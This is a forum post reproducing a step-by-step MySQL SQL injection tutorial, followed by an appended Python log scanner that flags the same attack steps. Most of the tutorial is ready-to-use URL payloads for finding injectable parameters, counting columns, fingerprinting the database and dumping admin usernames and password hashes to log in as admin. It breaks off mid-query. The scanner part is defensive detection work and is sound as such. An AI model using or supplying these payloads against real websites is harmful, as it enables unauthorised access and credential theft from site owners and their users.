BlackEntity - Topics
Subject: Hacking websites using SQL Inj
Replies: 0 Views: 1428

slik4lyf 11.02.10 - 10:45am
SQL Injection Tutorial
by Marezzi (MySQL)

In this tutorial I will describe how SQL injection works and how to use it to get some useful information.

First of all: What is SQL injection?
It's one of the most common vulnerabilities in web applications today. It allows an attacker to execute database queries in the URL and gain access to some confidential information etc... (in short).

1. SQL Injection (classic or error based or whatever you call it) :D
2. Blind SQL Injection (the harder part)

So let's start with some action :D

1). Check for vulnerability
Let's say that we have some site like this
http://www.site.com/news.php?id=5
Now to test if it is vulnerable we add to the end of the URL ' (quote), and that would be
http://www.site.com/news.php?id=5'
So if we get some error like
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc...
or something similar, that means it is vulnerable to SQL injection :)

2). Find the number of columns
To find the number of columns we use the statement ORDER BY (tells the database how to order the result). So how to use it? Well, just increment the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* -- no error
http://www.site.com/news.php?id=5 order by 2/* -- no error
http://www.site.com/news.php?id=5 order by 3/* -- no error
http://www.site.com/news.php?id=5 order by 4/* -- error (we get a message like Unknown column '4' in 'order clause' or something like that)
That means that it has 3 columns, because we got an error on 4.

3). Check for UNION function
With UNION we can select more data in one SQL statement. So we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that the number of columns is 3 in section 2).)
If we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works :)

4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/*
NOTE: if /* is not working or you get some error, then try --. It's a comment and it's important for our query to work properly.
Let's say that we have number 2 on the screen; now to check for the version we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
It should look like this
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." I didn't see any paper covering this problem, so I must write it :)
What we need is the convert() function, i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex(), i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get the MySQL version :D

5). Getting table and column name
Well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) --- later I will describe for MySQL 5 version. We must guess table and column names in most cases.
Common table names are: user/s, admin/s, member/s ...
Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e. it would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)
We know that the table admin exists... Now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
We get the username displayed on screen; an example would be admin, or superadmin etc...
Now to check if the column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
We see the password on the screen in hash or plain-text; it depends on how the database is set up :)
i.e. md5 hash, mysql hash, sha1...
Now we must complete the query to look nice :) For that we can use the concat() function (it joins strings), i.e.
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that I put 0x3a, its hex value for : (so 0x3a is the hex value for colon).
(There is another way for that, char(58), the ASCII value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get username:password displayed on screen, i.e. admin:admin or admin:somehash.
When you have this, you can login as admin or some superuser :D
If you can't guess the right table name, you can always try mysql.user (default). It has user and password columns, so an example would be
http://www.site.com/news.php?id=5 union all select 1,concat( *
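A defender-side addition, not from the post: a scanner that runs the request signatures the tutorial walks through (quote probe, ORDER BY counting, UNION SELECT, version fingerprint, concat/mysql.user pulls) over access-log lines and groups hits per client together with the 5xx responses that follow. The log lines, rule names and IP addresses are constructed for the example; plain pattern rules like these are a triage aid and miss encoded or obfuscated variants.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed common-log-format sample, not real traffic (assumption: the request
# line including the query string is logged).
SAMPLE_LOG = """\
203.0.113.9 - - [11/Feb/2010:10:40:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 2311
203.0.113.9 - - [11/Feb/2010:10:40:05 +0000] "GET /news.php?id=5' HTTP/1.1" 500 512
203.0.113.9 - - [11/Feb/2010:10:40:09 +0000] "GET /news.php?id=5%20order%20by%204/* HTTP/1.1" 500 512
203.0.113.9 - - [11/Feb/2010:10:40:14 +0000] "GET /news.php?id=5%20union%20all%20select%201,@@version,3/* HTTP/1.1" 200 2400
198.51.100.4 - - [11/Feb/2010:10:41:00 +0000] "GET /news.php?id=7 HTTP/1.1" 200 2290
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One rule per step of the tutorial, applied to each decoded query-string value.
RULES = [
    ("quote_probe", re.compile(r"^\d+'$")),                      # step 1: id=5'
    ("order_by_count", re.compile(r"\border\s+by\s+\d+", re.I)),  # step 2: order by n
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),  # step 3: union all select
    ("version_fingerprint", re.compile(r"@@version|\bversion\s*\(", re.I)),  # step 4
    ("credential_pull", re.compile(r"\bconcat\s*\(|mysql\.user", re.I)),      # step 5
]


def classify_value(value):
    """Names of every rule that matches one decoded parameter value, in RULES order."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_log(text):
    """Return {ip: {'hits': [(timestamp, param, rule)], 'errors': n}} for clients that
    tripped at least one rule; 'errors' counts 5xx responses seen after the first hit."""
    report = defaultdict(lambda: {"hits": [], "errors": 0})
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m["target"]).query
        for param, value in parse_qsl(query, keep_blank_values=True):  # parse_qsl percent-decodes
            for rule in classify_value(value):
                report[m["ip"]]["hits"].append((m["ts"], param, rule))
        if m["ip"] in report and m["status"].startswith("5"):
            report[m["ip"]]["errors"] += 1
    return dict(report)
```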